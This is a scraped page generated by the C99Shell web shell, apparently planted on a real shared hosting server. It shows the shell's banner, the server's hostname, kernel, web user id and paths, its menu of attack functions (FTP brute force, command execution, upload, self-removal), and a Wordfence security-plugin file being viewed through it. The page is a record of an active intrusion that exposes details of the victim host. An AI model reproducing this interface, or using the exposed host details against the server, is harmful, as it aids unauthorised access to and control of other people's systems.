!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordfence/views/scanner/   drwxr-xr-x
Free 179.65 GB of 490.84 GB (36.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scan-progress-detailed.php (2.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents the scan activity log and its controls.
 *
 * Expects $scanner.
 *
 * @var wfScanner $scanner The scanner state.
 */
?>
<div class="wf-alert wf-alert-danger" id="wf-scan-failed" style="display: none;">
    
</div>
<ul class="wf-flex-horizontal wf-flex-vertical-xs wf-flex-full-width wf-no-top wf-no-bottom">
    <li id="wf-scan-last-status"></li>
    <li id="wf-scan-activity-log-controls"><a href="#" id="wf-scan-email-activity-log"><?php _e('Email<span class="wf-hidden-xs"> activity</span> log''wordfence'); ?></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="<?php echo esc_attr(wfUtils::getSiteBaseURL()); ?>?_wfsf=viewActivityLog&amp;nonce=<?php echo esc_attr(wp_create_nonce('wp-ajax')); ?>" id="wf-scan-full-activity-log" target="_blank"><?php _e('View<span class="wf-hidden-xs"> full</span> log''wordfence'); ?></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" id="wf-scan-toggle-activity-log" class="<?php echo (wfPersistenceController::shared()->isActive('wf-scan-activity-log') ? 'wf-active' ''?>"><span class="wf-scan-activity-log-visible"><?php _e('Hide log''wordfence'); ?></span><span class="wf-scan-activity-log-hidden"><?php _e('Show log''wordfence'); ?></span></a></li>
</ul>
<div id="wf-scan-running-bar" style="<?php if (!$scanner->isRunning()) { echo 'display: none;'; } ?>"><div id="wf-scan-running-bar-pill"></div></div>
<ul id="wf-scan-activity-log" class="<?php echo (wfPersistenceController::shared()->isActive('wf-scan-activity-log') ? ' wf-active' ''?>"></ul>
<script type="application/javascript">
    (function($) {
        $(function() {
            $('#wf-scan-email-activity-log').on('click', function(e) {
                e.preventDefault();
                e.stopPropagation();

                WFAD.emailActivityLog();
            });

            $('#wf-scan-toggle-activity-log').on('click', function(e) {
                e.preventDefault();
                e.stopPropagation();

                var isActive = $('#wf-scan-activity-log').hasClass('wf-active');
                if (isActive) {
                    $('#wf-scan-activity-log').slideUp({
                        always: function() {
                            $('#wf-scan-activity-log').removeClass('wf-active');
                            $('#wf-scan-toggle-activity-log').removeClass('wf-active');
                        }
                    });
                }
                else {
                    $('#wf-scan-activity-log').slideDown({
                        always: function() {
                            $('#wf-scan-activity-log').addClass('wf-active');
                            $('#wf-scan-toggle-activity-log').addClass('wf-active');
                        }
                    });
                }

                WFAD.ajax('wordfence_saveDisclosureState', {name: 'wf-scan-activity-log', state: !isActive}, function() {});
            });
        });
    })(jQuery);
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0108 ]--